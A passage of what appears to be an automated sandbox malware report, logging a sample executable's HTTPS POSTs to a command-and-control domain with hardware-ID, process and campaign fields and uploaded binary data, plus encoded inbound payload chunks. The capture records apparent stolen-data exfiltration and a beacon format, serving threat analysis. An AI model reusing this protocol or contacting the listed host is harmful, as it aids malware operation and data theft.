2025-01-01 15:53:58 UTC	242	IN	Data Raw: 31 63 61 34 0d 0a 62 41 70 72 6d 69 41 6f 6a 65 48 4b 41 50 48 64 6d 67 75 76 72 32 64 4a 52 79 72 6d 67 33 76 39 57 52 45 39 52 68 39 44 32 4b 6f 58 4b 42 32 34 47 68 79 68 77 37 6c 6c 30 2b 66 75 65 64 72 4b 53 32 73 6d 54 73 53 35 48 5a 77 31 59 6c 68 71 50 54 57 31 69 46 5a 73 43 76 5a 54 54 61 48 44 72 33 6a 54 35 38 46 77 6a 63 6f 4a 61 33 30 49 67 2b 6b 5a 6e 44 56 7a 58 43 31 77 4d 37 54 4a 42 47 59 4d 38 6b 56 4c 36 59 43 6d 62 5a 53 34 2f 32 72 46 77 51 34 6b 4c 30 66 45 72 31 6d 59 49 7a 4d 48 5a 46 49 6d 72 4d 73 68 61 78 6a 78 41 6c 57 68 6d 75 68 6c 6e 2f 2b 67 4b 63 37 4b 42 53 55 68 54 6f 33 72 45 35 55 39 63 6c 6b 73 62 79 71 2b 77 67 52 6f 44 2f 4e 50 51 76 32 4e 72 47 71 66 76 76 56 71 6a 59 4e 46 Data Ascii: 1ca4bAprmiAojeHKAPHdmguvr2dJRyrmg3v9WRE9Rh9D2KoXKB24Ghyhw7ll0+fuedrKS2smTsS5HZw1YlhqPTW1iFZsCvZTTaHDr3jT58FwjcoJa30Ig+kZnDVzXC1wM7TJBGYM8kVL6YCmbZS4/2rFwQ4kL0fEr1mYIzMHZFImrMshaxjxAlWhmuhln/+gKc7KBSUhTo3rE5U9clksbyq+wgRoD/NPQv2NrGqfvvVqjYNF
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 4c 44 30 49 33 4b 46 4b 72 54 68 69 54 6a 46 77 4d 62 79 49 45 53 59 51 75 45 56 47 72 39 76 6f 61 70 2b 78 2f 57 72 43 79 67 51 72 4e 30 65 45 34 68 47 58 50 33 6c 51 4b 33 49 76 73 4d 38 47 59 51 37 33 52 55 4c 70 6a 4b 73 69 33 66 2f 2f 63 59 32 56 52 51 73 31 53 34 66 31 46 49 35 37 62 42 45 39 50 53 61 32 69 46 59 6f 44 2f 5a 44 52 2b 2b 52 6f 47 6d 59 75 75 70 69 78 4d 41 49 4b 79 68 43 69 2b 49 5a 6d 44 46 35 55 43 35 35 4c 4c 66 4f 44 6d 68 4a 74 67 4a 4e 39 38 50 77 49 72 43 36 36 47 37 42 32 30 63 52 5a 56 66 4b 2b 46 6d 59 4e 7a 4d 48 5a 48 55 6b 75 63 73 46 5a 77 72 77 53 56 6a 76 6b 61 35 76 6c 71 33 2b 62 4d 50 48 42 6a 6b 76 52 6f 4c 69 45 4a 51 79 64 6c 67 67 50 57 2f 36 7a 78 59 6f 55 62 68 6a 52 2b 53 50 6f 6e 57 54 2f 2b 63 6e 31 49 30 Data Ascii: LD0I3KFKrThiTjFwMbyIESYQuEVGr9voap+x/WrCygQrN0eE4hGXP3lQK3IvsM8GYQ73RULpjKsi3f//cY2VRQs1S4f1FI57bBE9PSa2iFYoD/ZDR++RoGmYuupixMAIKyhCi+IZmDF5UC55LLfODmhJtgJN98PwIrC66G7B20cRZVfK+FmYNzMHZHUkucsFZwrwSVjvka5vlq3+bMPHBjkvRoLiEJQydlggPW/6zxYoUbhjR+SPonWT/+cn1I0
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 6f 4c 75 46 4a 4e 37 50 52 38 6a 5a 57 48 69 69 43 52 72 48 66 74 49 43 4e 71 41 70 6d 79 55 71 62 68 32 67 39 52 46 4c 43 6b 49 33 4b 45 55 6e 6a 4e 31 54 53 74 77 49 72 54 47 41 57 30 47 38 45 4a 4b 34 6f 61 73 61 5a 69 38 39 57 33 66 78 77 55 6a 49 45 6d 4f 36 31 6e 52 65 33 52 48 5a 43 56 68 69 39 38 46 4b 6a 7a 37 54 45 54 6f 6c 65 68 39 33 61 61 34 62 73 47 4e 58 57 73 6f 51 49 48 6b 46 70 34 78 66 56 6f 75 63 53 6d 30 79 78 78 6e 44 66 68 4f 51 75 57 4f 70 6d 61 62 74 76 4e 69 79 38 30 45 49 57 55 47 78 4f 59 42 33 32 4d 7a 61 79 4e 78 4c 4c 57 4b 4f 32 73 48 39 6b 56 63 72 35 7a 6d 65 39 4f 34 39 43 6d 56 6a 51 6b 69 4a 55 4f 4f 35 52 6d 59 4e 6e 5a 63 49 33 34 73 76 63 49 41 62 77 33 30 53 30 66 70 67 36 39 6d 6c 71 33 39 59 4d 48 42 52 57 56 6c Data Ascii: oLuFJN7PR8jZWHiiCRrHftICNqApmyUqbh2g9RFLCkI3KEUnjN1TStwIrTGAW0G8EJK4oasaZi89W3fxwUjIEmO61nRe3RHZCVhi98FKjz7TEToleh93aa4bsGNXWsoQIHkFp4xfVoucSm0yxxnDfhOQuWOpmabtvNiy80EIWUGxOYB32MzayNxLLWKO2sH9kVcr5zme9O49CmVjQkiJUOO5RmYNnZcI34svcIAbw30S0fpg69mlq39YMHBRWVl
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 65 47 65 33 52 54 5a 43 56 68 73 38 45 63 5a 67 66 78 54 30 7a 6e 68 4b 5a 76 6d 4c 6e 7a 62 73 72 4c 43 43 4d 6f 54 59 66 67 48 5a 55 70 63 46 51 75 63 43 76 36 68 6b 35 76 45 62 67 61 43 73 69 50 67 58 4b 49 72 65 34 70 30 6f 4d 63 61 79 4a 45 78 4c 6c 5a 6e 44 52 36 55 43 78 31 4c 72 58 4d 41 47 34 50 39 55 64 46 35 5a 47 67 62 4a 36 30 39 32 4c 66 7a 51 67 76 4b 55 79 4d 36 68 50 66 64 54 4e 59 50 44 31 35 2b 76 30 44 5a 77 6e 37 56 41 72 77 7a 62 45 69 6c 4c 4f 34 4d 59 33 42 43 79 73 71 52 49 6a 71 45 5a 34 33 66 56 67 68 64 43 6d 79 32 67 39 73 41 66 6c 4d 52 65 36 48 72 57 65 58 75 50 78 76 77 6f 31 4c 61 79 4a 51 78 4c 6c 5a 73 42 78 47 48 51 56 48 59 61 57 47 46 79 67 4f 39 41 49 53 72 34 2b 72 62 70 75 77 2f 6d 44 42 78 77 77 67 4b 55 4f 41 37 Data Ascii: eGe3RTZCVhs8EcZgfxT0znhKZvmLnzbsrLCCMoTYfgHZUpcFQucCv6hk5vEbgaCsiPgXKIre4p0oMcayJExLlZnDR6UCx1LrXMAG4P9UdF5ZGgbJ6092LfzQgvKUyM6hPfdTNYPD15+v0DZwn7VArwzbEilLO4MY3BCysqRIjqEZ43fVghdCmy2g9sAflMRe6HrWeXuPxvwo1LayJQxLlZsBxGHQVHYaWGFygO9AISr4+rbpuw/mDBxwwgKUOA7
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 38 58 69 56 37 4d 37 33 42 48 47 59 45 39 30 70 43 35 6f 4b 73 5a 35 36 35 39 47 50 4d 79 67 73 6c 4c 51 6a 4b 6f 52 36 48 65 79 73 66 42 57 30 36 71 4e 34 44 53 51 54 33 41 6c 57 68 6d 75 68 6c 6e 2f 2b 67 4b 63 54 66 41 53 59 33 51 59 50 76 46 70 77 70 63 6c 49 76 62 79 61 31 7a 41 6c 6b 44 2f 64 45 53 2b 71 4a 70 47 57 57 74 50 64 6c 6a 59 4e 46 4c 44 30 49 33 4b 45 33 6c 43 68 6b 58 43 70 32 4e 36 47 49 45 53 59 51 75 45 56 47 72 39 76 6f 59 5a 69 30 2f 47 6e 42 7a 51 45 6d 4a 56 71 4c 35 68 36 57 4d 47 46 56 49 33 6f 71 73 73 4d 42 62 68 76 30 54 46 6a 71 6b 62 6f 69 33 66 2f 2f 63 59 32 56 52 52 30 69 57 4a 54 69 57 36 34 74 63 45 6b 76 63 43 33 36 31 30 42 78 53 66 39 4f 43 72 66 44 72 6d 32 61 76 50 64 6f 78 4d 45 49 4c 69 78 4e 68 65 63 64 6c 54 Data Ascii: 8XiV7M73BHGYE90pC5oKsZ5659GPMygslLQjKoR6HeysfBW06qN4DSQT3AlWhmuhln/+gKcTfASY3QYPvFpwpclIvbya1zAlkD/dES+qJpGWWtPdljYNFLD0I3KE3lChkXCp2N6GIESYQuEVGr9voYZi0/GnBzQEmJVqL5h6WMGFVI3oqssMBbhv0TFjqkboi3f//cY2VRR0iWJTiW64tcEkvcC3610BxSf9OCrfDrm2avPdoxMEILixNhecdlT
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 50 54 37 30 30 55 35 76 42 62 67 61 43 75 79 45 71 32 4f 5a 74 76 52 6d 79 73 6b 58 49 53 4a 61 68 65 41 53 6b 6a 64 7a 55 69 6c 33 49 4c 50 46 41 6d 55 4f 2f 30 31 50 72 38 33 6f 5a 59 76 2f 6f 43 6e 73 77 41 34 6e 66 68 4c 45 2f 6c 65 47 65 33 52 54 5a 43 56 68 75 73 49 4c 59 67 54 37 54 55 6e 39 67 71 35 77 6b 37 4c 79 65 38 66 47 41 43 59 6f 52 59 66 6e 48 35 51 33 59 56 59 6b 66 69 72 36 68 6b 35 76 45 62 67 61 43 73 79 55 76 6d 69 55 73 2b 35 69 7a 4d 34 54 4a 6a 55 49 79 71 45 49 6d 43 6f 7a 42 7a 4a 74 4e 72 33 58 51 48 46 4a 2f 30 34 4b 74 38 4f 75 61 35 57 34 2f 6d 66 66 79 41 4d 6b 4b 6b 47 4e 35 52 47 63 4f 33 64 62 49 33 67 69 74 73 4d 4a 61 77 62 38 53 30 54 6d 6a 4f 67 73 30 37 6a 67 4b 5a 57 4e 4a 44 41 6d 52 49 6d 68 42 74 45 69 4d 31 67 Data Ascii: PT700U5vBbgaCuyEq2OZtvRmyskXISJaheASkjdzUil3ILPFAmUO/01Pr83oZYv/oCnswA4nfhLE/leGe3RTZCVhusILYgT7TUn9gq5wk7Lye8fGACYoRYfnH5Q3YVYkfir6hk5vEbgaCsyUvmiUs+5izM4TJjUIyqEImCozBzJtNr3XQHFJ/04Kt8Oua5W4/mffyAMkKkGN5RGcO3dbI3gitsMJawb8S0TmjOgs07jgKZWNJDAmRImhBtEiM1g
2025-01-01 15:53:58 UTC	253	IN	Data Raw: 6f 68 57 4b 43 6e 7a 56 45 2f 6f 6c 65 70 58 6b 4c 48 32 62 74 75 4e 47 68 52 72 43 49 76 37 57 63 63 43 61 68 38 6a 63 57 48 69 69 42 74 76 43 66 39 59 58 4f 69 50 75 57 6d 65 73 39 70 6d 79 74 73 47 4a 43 5a 5a 6a 61 30 53 6b 6e 73 39 48 79 4e 6c 59 65 4b 49 49 57 38 66 2b 32 31 4a 2f 6f 72 6f 4c 4e 4f 34 37 69 6d 56 6a 54 74 72 4e 30 75 55 34 68 61 4f 42 54 4d 48 50 55 4e 68 73 64 34 4a 65 41 72 75 53 55 66 6a 6b 70 59 69 79 2b 75 71 4f 35 2b 66 56 7a 52 6c 56 37 75 76 57 5a 35 37 4b 32 59 39 50 54 66 36 6b 46 77 6d 53 65 6f 43 45 71 2f 45 71 33 43 42 75 66 74 2f 7a 6f 6f 37 46 51 4a 65 6a 75 59 4a 6d 43 78 38 48 32 6f 39 4c 76 71 51 4e 79 67 41 2f 31 6c 62 2b 59 36 34 5a 64 4f 41 74 69 6e 56 6a 56 31 72 45 45 75 4b 37 78 36 4a 4b 6a 35 34 0d 0a Data Ascii: ohWKCnzVE/olepXkLH2btuNGhRrCIv7WccCah8jcWHiiBtvCf9YXOiPuWmes9pmytsGJCZZja0Skns9HyNlYeKIIW8f+21J/oroLNO47imVjTtrN0uU4haOBTMHPUNhsd4JeAruSUfjkpYiy+uqO5+fVzRlV7uvWZ57K2Y9PTf6kFwmSeoCEq/Eq3CBuft/zoo7FQJejuYJmCx8H2o9LvqQNygA/1lb+Y64ZdOAtinVjV1rEEuK7x6JKj54
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 32 63 66 30 0d 0a 4d 6e 63 6d 71 73 38 5a 5a 30 6d 32 41 6b 79 76 32 2f 73 73 30 37 76 70 4b 5a 57 64 56 33 42 77 47 39 4f 78 53 34 42 31 61 68 38 79 50 58 6e 6f 68 6b 35 36 53 61 41 43 44 65 79 52 75 6d 53 51 71 66 73 75 38 2f 4d 69 4d 53 68 4f 6b 2f 41 6e 6f 54 78 70 55 69 4a 71 4d 50 62 64 44 57 59 48 2f 31 51 4b 6f 63 4f 6e 49 73 75 47 75 43 47 4e 38 6b 74 72 50 51 6a 63 6f 53 79 63 4e 58 31 59 4d 6d 78 73 6e 64 49 44 62 68 37 70 41 67 53 76 68 65 67 36 77 66 47 34 62 64 79 4e 58 58 74 33 45 39 47 79 54 73 39 70 62 42 45 39 50 54 66 36 6b 46 77 6d 53 65 6f 43 45 71 2f 45 71 33 43 42 75 66 74 2f 7a 6f 6f 37 46 51 74 50 67 75 51 65 6a 33 6c 64 56 44 42 36 59 66 53 49 41 53 68 52 77 51 49 43 72 37 7a 6d 49 6f 76 2f 6f 43 6e 34 7a 67 73 6c 49 6c 36 56 72 Data Ascii: 2cf0Mncmqs8ZZ0m2Akyv2/ss07vpKZWdV3BwG9OxS4B1ah8yPXnohk56SaACDeyRumSQqfsu8/MiMShOk/AnoTxpUiJqMPbdDWYH/1QKocOnIsuGuCGN8ktrPQjcoSycNX1YMmxsndIDbh7pAgSvheg6wfG4bdyNXXt3E9GyTs9pbBE9PTf6kFwmSeoCEq/Eq3CBuft/zoo7FQtPguQej3ldVDB6YfSIAShRwQICr7zmIov/oCn4zgslIl6Vr
2025-01-01 15:53:58 UTC	1369	IN	Data Raw: 7a 42 33 59 7a 59 61 69 49 56 69 68 4f 2b 31 42 59 36 59 43 2b 59 64 53 42 78 6b 37 44 79 67 51 39 4e 56 2b 4c 33 79 65 4b 4f 48 31 52 49 32 73 77 2b 6f 5a 4f 5a 30 6d 67 65 77 71 6e 77 35 63 73 30 36 65 34 4d 59 33 34 42 69 55 72 54 35 4c 77 56 4c 67 31 64 46 34 79 62 54 61 31 69 45 41 6f 44 37 67 61 47 4b 48 44 72 48 50 54 35 36 67 37 6c 70 68 57 66 48 55 61 6d 36 38 41 33 79 30 7a 42 33 59 7a 59 61 69 49 56 69 68 4f 2b 31 42 59 36 59 43 2b 59 64 53 42 78 6b 37 44 79 67 51 39 4e 56 2b 4c 72 6a 65 70 47 6b 31 68 4d 58 34 76 74 4d 38 59 65 55 6d 32 41 6b 57 76 32 35 45 69 32 2f 2f 48 4a 34 33 56 52 58 4e 6c 66 59 66 76 46 35 67 74 59 68 49 44 63 79 61 37 33 68 35 2f 42 72 64 73 66 4d 37 44 35 69 4b 56 2f 36 41 37 67 34 30 42 4f 6d 55 51 31 4c 4e 43 79 6d Data Ascii: zB3YzYaiIVihO+1BY6YC+YdSBxk7DygQ9NV+L3yeKOH1RI2sw+oZOZ0mgewqnw5cs06e4MY34BiUrT5LwVLg1dF4ybTa1iEAoD7gaGKHDrHPT56g7lphWfHUam68A3y0zB3YzYaiIVihO+1BY6YC+YdSBxk7DygQ9NV+LrjepGk1hMX4vtM8YeUm2AkWv25Ei2//HJ43VRXNlfYfvF5gtYhIDcya73h5/BrdsfM7D5iKV/6A7g40BOmUQ1LNCym

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49977	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:53:59 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TXBL6FP7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12776 Host: leeryspcieu.click
2025-01-01 15:53:59 UTC	12776	OUT	Data Raw: 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --TXBL6FP7Content-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--TXBL6FP7Content-Disposition: form-data; name="pid"2--TXBL6FP7Content-Disposition: form-data; name="lid"c2CoW0--viki-1--TXBL6FP7Content-Disposi
2025-01-01 15:54:00 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3n53rrm52ural880i294381v79; expires=Sun, 27 Apr 2025 09:40:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jNh24WacE360uIUuYt0mHgwVtBWfwXNFoIAaoCZFQ2HfUusYF9mn4yCTB9nm%2BKptz730fXv1vXk2hGFmPEKyWocRTDd%2BGAH0nQZkzlgzGuE6WW3ObySqbTmSNeN0gW52ePzKyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af721e35f793-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1478&rtt_var=569&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13707&delivery_rate=1899804&cwnd=152&unsent_bytes=0&cid=2ce26a9f20619f46&ts=1042&x=0"
2025-01-01 15:54:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:54:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49978	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:00 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RKU1FFS6PEEW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15042 Host: leeryspcieu.click
2025-01-01 15:54:00 UTC	15042	OUT	Data Raw: 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d Data Ascii: --RKU1FFS6PEEWContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--RKU1FFS6PEEWContent-Disposition: form-data; name="pid"2--RKU1FFS6PEEWContent-Disposition: form-data; name="lid"c2CoW0--viki-1--RKU1FFS6PEEW
2025-01-01 15:54:01 UTC	1144	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2h3ln64lna2e9egp7582braati; expires=Sun, 27 Apr 2025 09:40:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxxQTFSeLIrF%2Bez7Bl%2B290dOTIxy6PFXFzvHJ4WT%2B%2BjKsr%2FQiJC3%2BG0lxA4v1kfns%2BoLWYweshTDzkiYEhuf7bZ%2BKLdtBMLdJZ7VWQIKlVL0NQH%2FhNWa8ZQLWZh4bJIs50z9JA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af7c9bac5e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1575&rtt_var=593&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15977&delivery_rate=1839949&cwnd=216&unsent_bytes=0&cid=458ff4d6fed2141b&ts=706&x=0"
2025-01-01 15:54:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:54:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49979	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:02 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0ADCPECMN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20514 Host: leeryspcieu.click
2025-01-01 15:54:02 UTC	15331	OUT	Data Raw: 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --0ADCPECMNContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--0ADCPECMNContent-Disposition: form-data; name="pid"3--0ADCPECMNContent-Disposition: form-data; name="lid"c2CoW0--viki-1--0ADCPECMNContent-Dis
2025-01-01 15:54:02 UTC	5183	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 Data Ascii: un 4F([:7s~X`nO`i`
2025-01-01 15:54:03 UTC	1133	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3ao2ids7bcosb5n1h5fcafo0ck; expires=Sun, 27 Apr 2025 09:40:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qhGPP8NzWVZVUBVxB%2FPsyioOfCDGNwcnScibqmEjS4GLmHkk7VMLlIOewtsfsga6jwJ1LegGu04VlCKYK5oKUCmcK9M7756p6%2FUmya161m302GemB2qYrvjl%2FFTFVLviYAOu3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af85596f440b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=2467&rtt_var=931&sent=10&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21468&delivery_rate=1171749&cwnd=230&unsent_bytes=0&cid=159cfa9f8ef63651&ts=653&x=0"
2025-01-01 15:54:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:54:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49980	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:54:04 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C6D00O4HZE40U0P76 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1239 Host: leeryspcieu.click
2025-01-01 15:54:04 UTC	1239	OUT	Data Raw: 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a Data Ascii: --C6D00O4HZE40U0P76Content-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--C6D00O4HZE40U0P76Content-Disposition: form-data; 